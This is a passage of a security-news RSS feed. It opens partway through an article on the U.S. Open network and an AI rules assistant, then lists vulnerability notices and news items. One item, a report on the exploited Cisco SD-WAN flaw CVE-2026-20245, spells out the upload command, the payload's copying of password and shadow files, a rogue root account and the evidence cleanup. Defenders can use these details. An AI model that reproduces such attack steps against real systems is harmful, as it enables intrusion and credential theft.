<p>That observability story extends to AI. One of the headline features of the renewed Cisco–USGA partnership is the AI-powered rules assistant: an application that lets golfers and fans ask complex rules questions in the USGA app and receive near-instant guidance. Under the hood, Santora’s team started with question–answer pairs and built a knowledge graph that now spans hundreds of topics and clusters. They also built an evaluation program that identifies outliers — questions the system struggles with — and feeds them back into human review.</p>



<p>Cisco AI Defense wraps the assistant with security controls. It’s not enough to get rules right; the system must resist prompt injection, data exfiltration, and other AI-specific threats that are increasingly appearing in the wild. The teams monitor usage, validate models, and protect applications at runtime against misuse or abuse. Perhaps most importantly, they keep a human override in place. If the system isn’t confident, it won’t answer; it escalates to rules experts rather than bluffing.</p>



<p>This is a model network engineers should watch as AI assistants and agents proliferate across other industries. The U.S. Open rules assistant isn’t treated as a toy or a sidecar; it’s a mission-critical application that resides within the same protected fabric as POS, scoring, and broadcast and is subject to the same observability and security rigor.</p>



<h2 class="wp-block-heading">Lessons for network engineers beyond golf</h2>



<p>Strip away the golf-specific details, and a set of lessons emerges:</p>



<ul class="wp-block-list">
<li><strong>Design for tough, not ease.</strong> Assume transient structures, unknown RF patterns, seasonal layout changes, and harsh environmental conditions. The U.S. Open team rebuilds from scratch for each venue; most enterprises don’t need to go that far, but they should at least validate designs against real-world changes rather than assuming a static topology.</li>



<li><strong>Make redundancy systemic.</strong> Dual cores, dual firewalls, ring topologies, HSRP, Layer 3 everywhere, spare hardware on site, and live failover drills are all part of the fabric. Redundancy isn’t a checkbox on a data sheet; it’s an operational discipline.</li>



<li><strong>Treat every device as untrusted.</strong> Fan devices, vendor systems, broadcast laptops, and staff phones all arrive with unknown posture. Segmentation — per-client isolation, dedicated networks for sensitive functions, and strong identity — is the only sustainable way to cope with that diversity.</li>



<li><strong>Upload is the new download.</strong> Traditional designs optimized for download traffic are increasingly misaligned with reality. Conferences, stadiums, and campuses now behave like the U.S. Open: content creators and collaborative apps push far more data than they pull. Wi-Fi 7 and modern campus platforms help, but you still need to design RF and backhaul with upload and lateral traffic in mind.</li>



<li><strong>Integrate observability and AI security from day one.</strong> Logs alone aren’t enough. Coherent telemetry, full-stack observability, and AI-focused security controls should be treated as first-class requirements, especially as AI assistants move into business-critical workflows.</li>
</ul>



<h2 class="wp-block-heading">Final thoughts</h2>



<p>Perhaps the most important takeaway is cultural rather than technical. Santora and his team position AI and automation as tools for scale, not as replacements for experts. The rules assistant accelerates responses and expands reach, but it still defers to human judgment when confidence is low. The network uses automation and observability to keep a complex environment running, but it still depends on experienced engineers, in trailers on-site, watching for issues and making decisions.</p>



<p>For network engineers in other industries, that’s a useful template: Build AI-ready, secure, observable networks that assume the worst about their environment, and pair them with human expertise that can adapt when reality inevitably diverges from the design.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="673" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;</figure><p class="imageCredit">Zeus Kerravala</p></div>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Charting your way in: Helm template injection]]></title>
<description><![CDATA[During the audit of a Kubernetes cluster, we encountered an injection in a Helm template applied through ArgoCD. To our surprise, very few resources exist regarding YAML injection in vulnerable Helm templates. In this blog post, we will explore this kind of vulnerability and how to prevent its ex...]]></description>
<link>https://tsecurity.de/de/3633085/it-security-nachrichten/charting-your-way-in-helm-template-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633085/it-security-nachrichten/charting-your-way-in-helm-template-injection/</guid>
<pubDate>Mon, 29 Jun 2026 15:53:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[During the audit of a Kubernetes cluster, we encountered an injection in a Helm template applied through ArgoCD. To our surprise, very few resources exist regarding YAML injection in vulnerable Helm templates. In this blog post, we will explore this kind of vulnerability and how to prevent its exploitation.]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-gestützte „Fingerprint-Updates“ sollen Biometrie-Sicherheit verbessern]]></title>
<description><![CDATA[PITTSBURGH / LONDON (IT BOLTWISE) – Forscher schlagen eine neue Art vor, Fingerabdrücke nicht nur zu speichern, sondern „aktualisierbar“ zu machen, falls biometrische Daten kompromittiert werden. Statt den Originalabdruck dauerhaft zu hinterlegen wird eine geschützte Template-Version erzeugt, die...]]></description>
<link>https://tsecurity.de/de/3632186/it-security-nachrichten/ki-gestuetzte-fingerprint-updates-sollen-biometrie-sicherheit-verbessern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632186/it-security-nachrichten/ki-gestuetzte-fingerprint-updates-sollen-biometrie-sicherheit-verbessern/</guid>
<pubDate>Mon, 29 Jun 2026 09:23:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-fingerprint-template-reset-security.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-fingerprint-template-reset-security.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-fingerprint-template-reset-security-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-fingerprint-template-reset-security-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-fingerprint-template-reset-security-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-fingerprint-template-reset-security-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-fingerprint-template-reset-security-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">PITTSBURGH / LONDON (IT BOLTWISE) – Forscher schlagen eine neue Art vor, Fingerabdrücke nicht nur zu speichern, sondern „aktualisierbar“ zu machen, falls biometrische Daten kompromittiert werden. Statt den Originalabdruck dauerhaft zu hinterlegen wird eine geschützte Template-Version erzeugt, die verifiziert, aber schwer rückgängig zu machen ist. Damit soll sich Identitätsdiebstahl durch gestohlene Fingerprint-IDs deutlich entschärfen lassen. […]</p>
<div><a href="https://www.it-boltwise.de/ki-gestuetzte-fingerprint-updates-sollen-biometrie-sicherheit-verbessern.html">... den vollständigen Artikel <strong>»KI-gestützte „Fingerprint-Updates“ sollen Biometrie-Sicherheit verbessern«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/ki-gestuetzte-fingerprint-updates-sollen-biometrie-sicherheit-verbessern.html">KI-gestützte „Fingerprint-Updates“ sollen Biometrie-Sicherheit verbessern</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zeit und Geld bei Urlaubsplanung sparen: Google zeigt starke KI-Prompts für die Reisezeit]]></title>
<description><![CDATA[Immer mehr Menschen setzen bei der Urlaubsplanung nicht nur auf die klassischen Reiseportale oder Suchmaschinen für Hotels und Flüge, sondern auch auf die KI-Tools. Wir haben euch bereits Googles KI-Hacks für die Urlaubsplanung gezeigt und jetzt listen wir euch noch einmal drei Prompts, mit denen...]]></description>
<link>https://tsecurity.de/de/3631196/it-nachrichten/zeit-und-geld-bei-urlaubsplanung-sparen-google-zeigt-starke-ki-prompts-fuer-die-reisezeit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631196/it-nachrichten/zeit-und-geld-bei-urlaubsplanung-sparen-google-zeigt-starke-ki-prompts-fuer-die-reisezeit/</guid>
<pubDate>Sun, 28 Jun 2026 17:03:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="361" src="https://www.googlewatchblog.de/wp-content/uploads/google-reiseplanung-ki-hacks-1024x578.jpg" class="attachment-large size-large wp-post-image" alt="google reiseplanung ki-hacks" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/google-reiseplanung-ki-hacks-1024x578.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/google-reiseplanung-ki-hacks-300x169.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/google-reiseplanung-ki-hacks-768x433.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/google-reiseplanung-ki-hacks-640x361.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/google-reiseplanung-ki-hacks-800x451.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/google-reiseplanung-ki-hacks.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Immer mehr Menschen setzen bei der Urlaubsplanung nicht nur auf die klassischen Reiseportale oder Suchmaschinen für Hotels und Flüge, sondern auch auf die KI-Tools. Wir haben euch bereits <a href="https://www.googlewatchblog.de/2026/06/urlaubsplanung-mit-google-5-ki-hacks-fuer-eure-reisen-viele-tipps-rund-um-gemini-notebooks-und-mehr/"><strong>Googles KI-Hacks für die Urlaubsplanung</strong></a> gezeigt und jetzt listen wir euch noch einmal drei Prompts, mit denen ihr im Urlaub Zeit und Geld sparen könnt. Nutzt diese als Template, um eure Reisen zu optimieren.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/06/zeit-und-geld-bei-urlaubsplanung-sparen-google-zeigt-starke-ki-prompts-fuer-die-reisezeit/">Zeit und Geld bei Urlaubsplanung sparen: Google zeigt starke KI-Prompts für die Reisezeit</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/463fa50a93d2443c9e8c488827b45363"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/463fa50a93d2443c9e8c488827b45363" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/06/zeit-und-geld-bei-urlaubsplanung-sparen-google-zeigt-starke-ki-prompts-fuer-die-reisezeit/">Zeit und Geld bei Urlaubsplanung sparen: Google zeigt starke KI-Prompts für die Reisezeit</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50146 | withastro up to 6.3.2 data-astro-template cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in withastro astro up to 6.3.2. It has been rated as problematic. The affected element is an unknown function. The manipulation of the argument data-astro-template leads to basic cross site scripting.

This vulnerability is referenced as CVE-2026-50146. Remote exploitati...]]></description>
<link>https://tsecurity.de/de/3629802/sicherheitsluecken/cve-2026-50146-withastro-up-to-632-data-astro-template-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629802/sicherheitsluecken/cve-2026-50146-withastro-up-to-632-data-astro-template-cross-site-scripting/</guid>
<pubDate>Sat, 27 Jun 2026 17:39:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/withastro:astro">withastro astro up to 6.3.2</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. The affected element is an unknown function. The manipulation of the argument <em>data-astro-template</em> leads to basic cross site scripting.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-50146">CVE-2026-50146</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-0685 | Edgewall Genshi special elements used in a template engine (EUVD-2026-39792)]]></title>
<description><![CDATA[A vulnerability was found in Edgewall Genshi. It has been rated as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to improper neutralization of special elements used in a template engine.

This vulnerability is uniquely identified as CVE-2026-0685....]]></description>
<link>https://tsecurity.de/de/3628332/sicherheitsluecken/cve-2026-0685-edgewall-genshi-special-elements-used-in-a-template-engine-euvd-2026-39792/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628332/sicherheitsluecken/cve-2026-0685-edgewall-genshi-special-elements-used-in-a-template-engine-euvd-2026-39792/</guid>
<pubDate>Fri, 26 Jun 2026 20:24:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/edgewall:genshi">Edgewall Genshi</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality. The manipulation leads to improper neutralization of special elements used in a template engine.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-0685">CVE-2026-0685</a>. Local access is required to approach this attack. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[FOSSBilling Flaw Lets Admin Attackers Abuse DI Container for SQL Access and RCE]]></title>
<description><![CDATA[A critical server-side template injection (SSTI) vulnerability in FOSSBilling, tracked as CVE-2026-28496, is exposing instances to potential full database compromise and remote code execution (RCE), with early signs of active exploitation appearing shortly after public disclosure. This flaw is do...]]></description>
<link>https://tsecurity.de/de/3627208/it-security-nachrichten/fossbilling-flaw-lets-admin-attackers-abuse-di-container-for-sql-access-and-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627208/it-security-nachrichten/fossbilling-flaw-lets-admin-attackers-abuse-di-container-for-sql-access-and-rce/</guid>
<pubDate>Fri, 26 Jun 2026 13:37:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical server-side template injection (SSTI) vulnerability in FOSSBilling, tracked as CVE-2026-28496, is exposing instances to potential full database compromise and remote code execution (RCE), with early signs of active exploitation appearing shortly after public disclosure. This flaw is documented under GitHub advisory GHSA-57mv-jm88-66jc and affects all versions up to 0.7.2. It has been patched […]</p>
<p>The post <a href="https://gbhackers.com/fossbilling-flaw-lets-admin-attackers-abuse-di-container/">FOSSBilling Flaw Lets Admin Attackers Abuse DI Container for SQL Access and RCE</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical FOSSBilling SSTI Flaw Enables Information Disclosure and Remote Code Execution]]></title>
<description><![CDATA[A critical server-side template injection (SSTI) vulnerability in FOSSBilling, tracked as CVE-2026-28496, is already being actively exploited in the wild. The flaw carries a CVSS v4 score of 9.4 and affects all FOSSBilling releases through version 0.7.2; a patch is available in version 0.8.0. The...]]></description>
<link>https://tsecurity.de/de/3627204/it-security-nachrichten/critical-fossbilling-ssti-flaw-enables-information-disclosure-and-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627204/it-security-nachrichten/critical-fossbilling-ssti-flaw-enables-information-disclosure-and-remote-code-execution/</guid>
<pubDate>Fri, 26 Jun 2026 13:37:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical server-side template injection (SSTI) vulnerability in FOSSBilling, tracked as CVE-2026-28496, is already being actively exploited in the wild. The flaw carries a CVSS v4 score of 9.4 and affects all FOSSBilling releases through version 0.7.2; a patch is available in version 0.8.0. The vulnerability, identified as CWE-1336 (Improper Neutralization of Special Elements in […]</p>
<p>The post <a href="https://cyberpress.org/critical-fossbilling-ssti-flaw/">Critical FOSSBilling SSTI Flaw Enables Information Disclosure and Remote Code Execution</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FOSSBilling Flaw Lets Admin Attackers Abuse DI Container for SQL Access and RCE]]></title>
<description><![CDATA[A critical server-side template injection (SSTI) vulnerability in FOSSBilling, tracked as CVE-2026-28496, is exposing instances to potential full database compromise and remote code execution (RCE), with early signs of active exploitation appearing shortly after public disclosure. This flaw is do...]]></description>
<link>https://tsecurity.de/de/3627195/it-security-nachrichten/fossbilling-flaw-lets-admin-attackers-abuse-di-container-for-sql-access-and-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627195/it-security-nachrichten/fossbilling-flaw-lets-admin-attackers-abuse-di-container-for-sql-access-and-rce/</guid>
<pubDate>Fri, 26 Jun 2026 13:37:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical server-side template injection (SSTI) vulnerability in FOSSBilling, tracked as CVE-2026-28496, is exposing instances to potential full database compromise and remote code execution (RCE), with early signs of active exploitation appearing shortly after public disclosure. This flaw is documented…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fossbilling-flaw-lets-admin-attackers-abuse-di-container-for-sql-access-and-rce/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fossbilling-flaw-lets-admin-attackers-abuse-di-container-for-sql-access-and-rce/">FOSSBilling Flaw Lets Admin Attackers Abuse DI Container for SQL Access and RCE</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-20245 Zero-Day Exploited in Cisco Catalyst SD-WAN Manager to Gain Root Access]]></title>
<description><![CDATA[A newly disclosed zero-day vulnerability, CVE-2026-20245, has been exploited by a threat actor targeting Cisco Catalyst SD-WAN Manager. By exploiting a flaw in the platform's file to upload functionality, the threat actor escalated privileges from a compromised administrative account to root acce...]]></description>
<link>https://tsecurity.de/de/3626654/it-security-nachrichten/cve-2026-20245-zero-day-exploited-in-cisco-catalyst-sd-wan-manager-to-gain-root-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626654/it-security-nachrichten/cve-2026-20245-zero-day-exploited-in-cisco-catalyst-sd-wan-manager-to-gain-root-access/</guid>
<pubDate>Fri, 26 Jun 2026 09:53:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1126" height="614" src="https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="CVE-2026-20245" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2.webp 1126w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-1024x558.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-750x409.webp 750w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2.webp 1126w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-300x164.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-1024x558.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-768x419.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-600x327.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-150x82.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-20245-2-750x409.webp 750w" sizes="(max-width: 1126px) 100vw, 1126px" title="CVE-2026-20245 Zero-Day Exploited in Cisco Catalyst SD-WAN Manager to Gain Root Access 1"></p><span data-contrast="auto">A newly disclosed zero-day vulnerability, CVE-2026-20245, has been exploited by a threat actor targeting Cisco Catalyst SD-WAN Manager. By exploiting a flaw in the platform's file to upload functionality, the threat actor escalated privileges from a compromised administrative account to root access and used extensive anti-forensic measures to erase evidence of the attack.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Threat Actor Abused Cisco Catalyst SD-WAN Manager to Gain Root Access</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Mandiant found that the threat actor initially established unauthorized peering connections before accessing Cisco Catalyst SD-WAN Manager over SSH. In March 2026, the attacker authenticated using the default vmanage-admin account, changed the default admin account password, logged into the web interface, and exfiltrated SD-WAN fabric configurations, including device, controller, and template information. </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The original password was then restored to reduce the likelihood of detection. The researchers noted that neither the vmanage-admin nor admin accounts provide root shell access, prompting the attacker to <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="28830">exploit</a> CVE-2026-20245 for privilege escalation.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">CVE-2026-20245 was Exploited Through a Malicious CSV Upload</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The <a href="https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager/?hl=en" target="_blank" rel="nofollow noopener">vulnerability exists</a> because Cisco Catalyst SD-WAN Manager fails to properly filter malicious data uploaded through its tenant file upload feature. The <a class="wpil_keyword_link" href="https://cyble.com/threat-actor/" target="_blank" rel="noopener" title="threat actor" data-wpil-keyword-link="linked" data-wpil-monitor-id="28831">threat actor</a> exploited CVE-2026-20245 by uploading a crafted file named evil_tenant.csv using the com</span><span data-contrast="auto">mand:</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<blockquote><span data-contrast="auto">request tenant-upload tenant-list /home/admin/evil_tenant.csv <a class="wpil_keyword_link" href="https://thecyberexpress.com/how-to-get-a-vpn/" title="vpn" data-wpil-keyword-link="linked" data-wpil-monitor-id="28833">vpn</a> 0</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span></blockquote>
<span data-contrast="auto">Reported to Cisco by Mandiant, CVE-2026-20245 affects the command-line interface of Cisco Catalyst SD-WAN Controllers and allows an authenticated local attacker to execute arbitrary commands as root through a specially crafted file.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The malicious <a href="https://thecyberexpress.com/malicious-actors-macropack-red-team-payloads/" target="_blank" rel="noopener">payload</a> backed up configuration files, preserved copies of /etc/passwd and /etc/shadow, and created a new root-level account named troot. Mandiant later observed the threat actor switching from the admin account to troot using the </span><span data-contrast="auto">su</span><span data-contrast="auto"> command.</span>
<h3 aria-level="2"><b><span data-contrast="none">Rogue Peering Activity Preceded Exploitation</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Mandiant observed multiple unauthorized peering connections between late 2025 and January 2026. Researchers believe these may have exploited CVE-2026-20127 or CVE-2026-20182, two critical Cisco <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28832">vulnerabilities</a> affecting peering authentication that allow remote attackers to bypass authentication and gain administrative privileges.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Further rogue peering activity in March 2026 targeted software versions not vulnerable to CVE-2026-20127. Cisco confirmed the activity also did not rely on CVE-2026-20182, suggesting the <a href="https://thecyberexpress.com/malicious-actors-macropack-red-team-payloads/" target="_blank" rel="noopener">threat actor</a> may have reused stolen certificate material from an earlier compromise. Mandiant said it remains unclear whether the same group conducted both campaigns.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">To conceal the intrusion, the threat actor deleted evil_tenant.csv, restored modified configuration files, removed temporary artifacts, and executed a validation script to confirm that malicious files, the troot account, and altered configuration files had been removed or restored.</span>
<h3 aria-level="2"><b><span data-contrast="none">Implications and Mitigation</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Mandiant said the campaign reflects the growing "living off the edge" trend, where attackers target network appliances that often lack detailed forensic visibility while providing centralized control over enterprise environments. Such platforms remain attractive to <a href="https://thecyberexpress.com/ios-exploit-kit-dubbed-darksword/" target="_blank" rel="noopener">state-sponsored actors</a> seeking long-term intelligence collection.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Organizations are advised to collect diagnostic logs using the </span><span data-contrast="auto">request admin-tech</span><span data-contrast="auto"> command, investigate any indicators of compromise, and report confirmed incidents to Cisco TAC. Cisco recommends upgrading Cisco Catalyst SD-WAN Manager to versions 20.9.9.2, 20.12.7.2, 20.15.4.5, 20.15.5.3, 20.18.3.1, 26.1.1.2, or later to remediate CVE-2026-20245 and following its SD-WAN hardening guidance.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Recovered indicators include the malicious evil_tenant.csv file with SHA-256 hash b82936f37648518425c7d3cf9e09eaffa41d7cdb3840f6a40287e3a108880f7b and rogue IP addresses including 126.51.108[.]152, 76.92.245[.]217, 207.190.37[.]94, 23.245.7[.]178, 153.186.231[.]233, 167.179.79[.]189, 45.32.38[.]160, and 209.137.225[.]101. </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Google SecOps also released detections covering behaviors associated with the threat actor, while Mandiant acknowledged Cisco PSIRT for its collaboration during the coordinated disclosure process.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[Hi, everyone! We've just released Chrome 149 (149.0.7827.200) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know...]]></description>
<link>https://tsecurity.de/de/3626131/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626131/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Fri, 26 Jun 2026 03:38:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi, everyone! We've just released <b>Chrome 149 (149.0.7827.200)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.197..149.0.7827.200?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_01245939337.html"> Desktop releases</a> (Windows &amp; Mac: 149.0.7827.200/201, Linux: 149.0.7872.200) unless otherwise noted.</div><div><div><br></div><div><div>Harry Souders</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Dev 151 (151.0.7910.0) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new i...]]></description>
<link>https://tsecurity.de/de/3625347/it-security-nachrichten/chrome-dev-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625347/it-security-nachrichten/chrome-dev-for-android-update/</guid>
<pubDate>Thu, 25 Jun 2026 18:54:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
